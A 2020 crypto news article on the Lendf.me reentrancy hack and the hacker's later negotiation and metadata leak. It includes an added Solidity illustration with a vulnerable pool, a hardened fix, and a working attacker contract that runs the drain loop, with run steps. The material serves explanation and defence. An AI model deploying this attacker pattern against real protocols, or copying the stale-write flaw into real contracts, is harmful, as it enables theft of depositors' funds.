DForce Hacker Attempts to Negotiate After Allegedly Leaking His Identity

Published at: April 20, 2020

The world of decentralized finance (DeFi) suffered yet another incident on April 19 as Chinese lending platform Lendf.me, part of the dForce network, was drained of almost all of its funds. 

The hack is shaping up to be different from others, as the hacker seems to be negotiating with the founders of the protocol.

As reported by Cointelegraph yesterday, the attack occurred at 8:45 AM Chinese time on April 19, which corresponds to 8:45 PM Eastern time on April 18. The attacker used a reentrancy attack, a well-known class of smart-contract vulnerability, made possible by the transfer hooks that the ERC-777 token standard adds on top of ERC-20.

How did the hack work?

The hacker used the imBTC token as the Trojan horse of the attack. It is one of many Ethereum (ETH) wrappers for Bitcoin (BTC), and it implements the ERC-777 specification. ERC-777 extends the common ERC-20 standard with hooks that call back into the sender and the recipient on every transfer. That makes it more capable but also riskier, especially in a DeFi context, because a token transfer hands execution to whatever contract the sender controls before the transfer completes.

The hack combined those hooks with a crucial flaw in how Lendf.me’s contracts updated a user’s balance.

As an analyst going by the pseudonym of Frank Topbottom explained on Twitter, the hacker executed many iterations of a simple attack.

In every transaction, the hacker first deposited imBTC on the Lendf.me platform, which was credited to his account’s balance. A second, minuscule deposit in the same transaction triggered imBTC’s transfer hook, which re-entered Lendf.me and withdrew the tokens deposited moments earlier.

Crucially, that withdrawal never registered on the hacker’s balance: the deposit function had read the balance before handing control to the token transfer, and it wrote that stale value back once the transfer completed, overwriting the deduction the withdrawal had made. He was thus free to deposit the same imBTC again, roughly doubling his credited balance with every pass.

Eventually, the hacker siphoned almost all of the imBTC present on the platform, some 291 imBTC ($2 million), according to the analyst.

He then kept running the same loop; with the imBTC gone, each pass simply inflated his credited balance until it covered the entirety of the funds held by the protocol.

Finally, he used the fictitious balance as collateral to borrow almost every token available on the Lendf.me platform, carrying off about $25 million in various cryptocurrencies and stablecoins.
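To make the mechanism concrete, here is an added illustration that is not dForce’s, Lendf.me’s or imBTC’s code: a toy ERC-777-style token whose transfers call the sender’s tokensToSend hook, a pool whose supply() writes back a cached balance after the external call, a hardened pool, and an attacker contract that runs the deposit-then-tiny-deposit loop described above. The contract and function names, the amounts, and the plain mapping that stands in for the ERC-1820 hook registry are all assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// ERC-777 sender hook: the token calls this on `from` BEFORE moving any balance,
// which is the re-entry point the attacker contract abuses.
interface IERC777Sender {
    function tokensToSend(address operator, address from, address to, uint256 amount,
                          bytes calldata userData, bytes calldata operatorData) external;
}

interface IPool { // surface shared by the vulnerable and hardened pools
    function supply(uint256 amount) external;
    function withdraw(uint256 amount) external;
    function supplied(address user) external view returns (uint256);
}

// Toy ERC-777-style token (a constructed stand-in for imBTC, not its code); a plain
// mapping replaces the ERC-1820 registry lookup for the sender hook.
contract HookedToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    mapping(address => bool) public hasSenderHook;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; } // demo only, unguarded
    function registerSenderHook() external { hasSenderHook[msg.sender] = true; }
    function approve(address spender, uint256 amount) external { allowance[msg.sender][spender] = amount; }
    function transfer(address to, uint256 amount) external { _move(msg.sender, to, amount); }
    function transferFrom(address from, address to, uint256 amount) external {
        require(allowance[from][msg.sender] >= amount, "allowance");
        allowance[from][msg.sender] -= amount;
        _move(from, to, amount);
    }
    function _move(address from, address to, uint256 amount) internal {
        if (hasSenderHook[from]) IERC777Sender(from).tokensToSend(msg.sender, from, to, amount, "", "");
        require(balanceOf[from] >= amount, "balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
    }
}

// The accounting bug: supply() caches the balance, makes the external token call,
// then writes the stale copy back, restoring whatever a re-entrant withdraw() removed.
contract VulnerablePool is IPool {
    HookedToken public immutable token;
    mapping(address => uint256) public override supplied;
    constructor(HookedToken t) { token = t; }
    function supply(uint256 amount) external override {
        uint256 cached = supplied[msg.sender];                 // 1. read
        token.transferFrom(msg.sender, address(this), amount); // 2. external call, hook fires
        supplied[msg.sender] = cached + amount;                // 3. stale write
    }
    function withdraw(uint256 amount) external override {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;                        // undone by step 3 of the enclosing supply()
        token.transfer(msg.sender, amount);
    }
}

// Hardened: checks-effects-interactions (storage updated in place before the token
// call) plus a re-entrancy guard, so the hook's call into withdraw() reverts the tx.
contract HardenedPool is IPool {
    HookedToken public immutable token;
    mapping(address => uint256) public override supplied;
    bool private locked;
    constructor(HookedToken t) { token = t; }
    modifier nonReentrant() { require(!locked, "reentrant"); locked = true; _; locked = false; }
    function supply(uint256 amount) external override nonReentrant {
        supplied[msg.sender] += amount;                        // effect first, no cached copy
        token.transferFrom(msg.sender, address(this), amount); // interaction last
    }
    function withdraw(uint256 amount) external override nonReentrant {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;
        token.transfer(msg.sender, amount);
    }
}

// Attacker: per round, deposit everything held, then deposit 1 unit; the hook on that
// second deposit withdraws the earlier credit while the stale write keeps it on the
// books, so the credit roughly doubles each round and other depositors' tokens drain.
contract Attacker is IERC777Sender {
    HookedToken public immutable token;
    IPool public immutable pool;
    constructor(HookedToken t, IPool p) {
        token = t; pool = p;
        t.registerSenderHook();
        t.approve(address(p), type(uint256).max);
    }
    function attack(uint256 rounds) external {
        for (uint256 i = 0; i < rounds; i++) {
            pool.supply(token.balanceOf(address(this)));
            pool.supply(1);
        }
    }
    function tokensToSend(address, address, address to, uint256, bytes calldata, bytes calldata) external override {
        require(msg.sender == address(token), "not token");
        if (to != address(pool)) return;                       // react only to deposits into the pool
        uint256 credited = pool.supplied(address(this));
        uint256 available = token.balanceOf(address(pool));
        uint256 take = credited < available ? credited : available;
        if (take > 0) pool.withdraw(take);                     // re-enters the pool mid-supply()
    }
}
```

To run it, deploy HookedToken, mint 1,000 units to an ordinary account that approves the pool and calls supply(1000), mint 100 units to the Attacker and call attack(2). Traced through: after round one the attacker holds 99 tokens but is credited 101; after round two it holds 300 tokens (up from 100) and is still credited 201, while the pool holds only 800 tokens against 1,201 of credits. That phantom credit is what the real attacker then borrowed against. Pointed at HardenedPool instead, the first round reverts with “reentrant” the moment the hook calls withdraw(). One caveat: a real ERC-777 token also fires tokensReceived on the recipient, so a pool’s withdraw() is a second re-entry point, and the guard belongs on every state-changing function, not only on deposits.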

The hacker already got partially busted

Shortly after the attack, an interesting exchange of on-chain messages occurred.

The hacker sent three transactions of PAX tokens totaling $250,000 to 1inch.exchange, ParaSwap and an account labeled “Lendf.me admin.” This is most likely a symbolic gesture, as pax means “peace” in Latin.

Lendf.me replied with an email address to contact and later signaled that it had responded to the hacker’s inquiry. The hacker subsequently returned Huobi-issued assets to Lendf.me worth about $2.6 million.

Lendf.me finally sent a message with a mildly threatening tone, saying “Contact us, for your better future.”

Sergej Kunz, the CEO of 1inch.exchange, a decentralized exchange aggregator the hacker used to swap some of the funds, explained to Cointelegraph that the cybercriminal leaked important metadata about himself by using the web frontend served from 1inch’s content delivery network, whose request logs record the visitor’s connection and browser details, instead of the IPFS-based frontend.

Specifically, all three swap requests came from a single Chinese IP address, which suggests that the hacker did not route his traffic through an anonymity network like Tor. Kunz theorized that the address belongs to a VPN or proxy server, whose operator may be subject to subpoenas.

The hacker’s browser also revealed that he was using a Mac, along with his screen resolution and his system language, which was set to “en-us.”

It is worth noting that such browser metadata is trivial to spoof, but the number of distinctive details in it suggested to 1inch that leaking them was simply an oversight. Kunz concluded:

“He seems to be a good programmer, but an inexperienced hacker.”

As police investigations are already underway, according to Kunz, it appears likely that the hacker will be forced to return the money in the hope of lenient treatment.
